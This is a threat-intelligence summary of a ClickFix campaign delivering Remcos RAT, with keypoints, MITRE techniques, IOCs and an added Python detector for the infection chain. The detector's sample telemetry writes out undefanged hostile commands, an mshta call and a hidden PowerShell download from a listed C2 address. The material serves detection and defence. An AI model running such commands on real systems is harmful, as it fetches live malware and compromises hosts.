ZPHP Campaign Delivering Remcos RAT Impacting SLTTs

CIS CTI identified an ongoing ZPHP (SmartApeSG) campaign targeting U.S. SLTT organizations that uses fake CAPTCHAs and the ClickFix social engineering technique to deliver remote access tools, including Remcos RAT. The campaign’s kill chain leverages injected JavaScript (middleware-render.js), mshta/PowerShell execution, DLL sideloading, steganography, and persistence named “Intel PLLQ Components,” and is assessed likely to continue affecting SLTTs in 2026. #ZPHP #Remcos

Keypoints

  • Threat actors inject malicious JavaScript (middleware-render.js) into compromised Node.js sites and replace page content with a fake Cloudflare Turnstile CAPTCHA to coerce users into running commands (ClickFix).
  • ClickFix social engineering instructs victims to open the Run dialog and paste a clipboard command that launches mshta.exe, which then executes an HTA and a hidden PowerShell script to download a ZIP payload.
  • The final payload is a large ZIP, written to AppData\Local under a .pdf file name before extraction, containing over 90 files; Remcos RAT is concealed among them via steganography and loaded through DLL sideloading (mega_altpllq.exe sideloads the malicious ActionCenterHelper.dll).
  • Remcos establishes persistence via a scheduled task and a Run registry key both named “Intel PLLQ Components,” beacons to C2 over HTTPS with a self-signed certificate, and provides full remote control capabilities (keylogging, screen/webcam capture, data theft).
  • CIS detections and network telemetry show broad impact: multiple SLTT alerts in Feb 2026, 61 ZPHP alerts in CIS Albert IDS at start of 2026, and ~500,000 blocked DNS requests tied to the campaign across 162 MS-ISAC member organizations.
  • CIS CTI assesses ClickFix variants are likely to be reused and scaled across SLTT targets throughout 2026 due to ease of implementation and fast compromise potential; MS-ISAC/CIS sharing provided hundreds of IOCs to members.
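The chain in the keypoints above maps cleanly onto endpoint telemetry, so here is an added detection example (written for this page, not CIS or MS-ISAC code) that walks a constructed set of Sysmon-style events and flags each stage: mshta.exe spawned by explorer.exe (the Run dialog's host process) with a URL on its command line, hidden PowerShell whose parent is mshta.exe, a file with ZIP magic written under AppData\Local with a .pdf name, the mega_altpllq.exe and ActionCenterHelper.dll pair landing in one directory, and a task or Run value named "Intel PLLQ Components". Only the file names, the persistence name and the 193.42.38[.]42 address come from the write-up; the event schema, user name, extraction directory and the exact command lines are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Indicators taken from the CIS write-up; everything else here is constructed.
PERSISTENCE_NAME = "intel pllq components"
SIDELOAD_EXE = "mega_altpllq.exe"
SIDELOAD_DLL = "actioncenterhelper.dll"


@dataclass
class Event:
    kind: str          # "process", "file", "registry" or "task" (assumed schema)
    image: str = ""    # process image path (process events)
    parent: str = ""   # parent image path (process events)
    cmdline: str = ""  # command line (process events)
    path: str = ""     # file path (file events)
    head: bytes = b""  # first bytes of the written file (file events)
    name: str = ""     # Run value name or scheduled task name (registry/task)


def _base(p: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return p.rsplit("\\", 1)[-1].lower()


def _dir(p: str) -> str:
    """Lower-cased directory component of a Windows path."""
    return p.rsplit("\\", 1)[0].lower() if "\\" in p else ""


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for every stage of the chain present in events."""
    hits = []
    pair_dirs = {}  # directory -> members of the sideload pair written there
    for e in events:
        if e.kind == "process":
            img, par, cl = _base(e.image), _base(e.parent), e.cmdline.lower()
            # T1204 / T1218.005: mshta.exe launched from the Run dialog with a remote URL.
            if img == "mshta.exe" and par == "explorer.exe" and re.search(r"https?://", cl):
                hits.append(("clickfix_mshta", e.cmdline))
            # T1059.001: hidden PowerShell (-w hidden / -WindowStyle Hidden) under mshta.exe.
            if img in ("powershell.exe", "pwsh.exe") and par == "mshta.exe" \
                    and re.search(r"-w\w*\s+hid", cl):
                hits.append(("hidden_powershell_from_mshta", e.cmdline))
            # T1574.001: the sideload trigger executable running at all.
            if img == SIDELOAD_EXE:
                hits.append(("sideload_trigger_exec", e.image))
        elif e.kind == "file":
            p = e.path.lower()
            # ZIP local-file-header magic ("PK\x03\x04") written as a .pdf under AppData\Local.
            if "\\appdata\\local\\" in p and p.endswith(".pdf") and e.head[:2] == b"PK":
                hits.append(("zip_disguised_as_pdf", e.path))
            if _base(p) in (SIDELOAD_EXE, SIDELOAD_DLL):
                pair_dirs.setdefault(_dir(p), set()).add(_base(p))
        elif e.kind in ("registry", "task"):
            # T1053.005 / T1547.001: persistence named to resemble an Intel component.
            if e.name.strip().lower() == PERSISTENCE_NAME:
                hits.append((f"persistence_{e.kind}", e.name))
    for d, names in pair_dirs.items():
        if {SIDELOAD_EXE, SIDELOAD_DLL} <= names:
            hits.append(("sideload_pair_dropped", d))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP = r"C:\Users\alice\AppData\Local\zphp_extract"  # extraction directory: assumed

# Constructed sample telemetry (not real logs) exercising every stage plus benign noise.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\System32\mshta.exe", parent=r"C:\Windows\explorer.exe",
          cmdline="mshta http://193.42.38.42/rate"),  # URL path is assumed
    Event("process", image=PS, parent=r"C:\Windows\System32\mshta.exe",
          cmdline="powershell -w hidden -c \"iwr http://193.42.38.42/limit -OutFile "
                  "$env:LOCALAPPDATA\\483921.pdf\""),
    Event("file", path=r"C:\Users\alice\AppData\Local\483921.pdf", head=b"PK\x03\x04"),
    Event("file", path=DROP + "\\mega_altpllq.exe", head=b"MZ"),
    Event("file", path=DROP + "\\ActionCenterHelper.dll", head=b"MZ"),
    Event("process", image=DROP + "\\mega_altpllq.exe", parent=PS),
    Event("task", name="Intel PLLQ Components"),
    Event("registry", name="Intel PLLQ Components"),
    # Benign: local HTA without a URL, and a genuine PDF outside AppData\Local.
    Event("process", image=r"C:\Windows\System32\mshta.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r"mshta C:\tools\local.hta"),
    Event("file", path=r"C:\Users\alice\Downloads\report.pdf", head=b"%PDF-1.7"),
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:30} {detail}")
```

Each rule fires on one stage independently, so a host that only shows the persistence name or only the disguised ZIP still surfaces; correlating two or more hits on the same host is what turns the individual alerts into a confident ClickFix-to-Remcos finding. The `.pdf`-plus-`PK` check is the one worth keeping even if the file names change, since the extension mismatch is a property of the delivery method rather than of this particular build.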

MITRE Techniques

  • [T1204] User Execution – Social engineering coerces the user to run a clipboard-injected command from the Run dialog, which starts the kill chain (‘socially engineering the victim to run a command on their machine’)
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – The script verifies its environment before proceeding (‘environment verification step that checks for the existence of notepad.exe in the System32 directory before executing mshta.exe’)
  • [T1218.005] Signed Binary Proxy Execution: Mshta – mshta.exe executes the next-stage HTA, named “rate”, which constructs and launches a hidden PowerShell payload
  • [T1059.001] PowerShell – The HTA constructs and runs a hidden PowerShell script that downloads and extracts the ZIP payload (‘constructs a PowerShell script that runs in a hidden command prompt’)
  • [T1574.001] DLL Side-Loading – The final stage uses a legitimate-looking executable to sideload a malicious DLL that loads the encrypted Remcos payload (‘Mega_altpllq.exe is the primary executable and the trigger for DLL sideloading, while ActionCenterHelper.dll is a maliciously sideloaded DLL’)
  • [T1055] Process Injection – The sideloaded DLL decrypts the Remcos payload in memory and injects it into a process (‘decrypt it in memory, and inject it’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Remcos establishes persistence via a scheduled task named to mimic legitimate software (‘establishes persistence through a scheduled task and a Windows registry Run key, both named Intel PLLQ Components’)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence is also achieved through a Run registry value named to resemble an Intel component (‘establishes persistence through a scheduled task and a Windows registry Run key, both named Intel PLLQ Components’)
  • [T1027.005] Obfuscated Files or Information: Steganography – The Remcos RAT is concealed within the legitimate-looking files inside the ZIP archive (‘Remcos RAT hidden via steganography among the over 90 files’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Remcos beacons and C2 communications occur over HTTPS using a self-signed certificate (‘beacons to its C2 server over HTTPS using a self-signed certificate’)

Indicators of Compromise

  • [IP Address] C2 and hosting infrastructure – 193.42.38[.]42 (served /limit and hosted the HTA/ZIP), 192.144.56[.]80:443 (observed Remcos C2)
  • [File Name] Malicious JavaScript and stages – middleware-render.js (injected JS), rate.hta (next-stage HTA), and dropped files including mega_altpllq.exe, ActionCenterHelper.dll and autohealth.dat
  • [File Path] Download/extraction location – C:\Users\[username]\AppData\Local\[Random6DigitString].pdf (ZIP saved with a .pdf extension before extraction)
  • [URL/Download] Download endpoint – hxxp://193.42.38[.]42/limit (ZIP download location referenced by the PowerShell script)
  • [Registry/Task Name] Persistence indicator – “Intel PLLQ Components” (name used for both the scheduled task and the Run registry value)


Read more: https://www.cisecurity.org/insights/blog/zphp-campaign-delivering-remcos-rat-impacting-sltts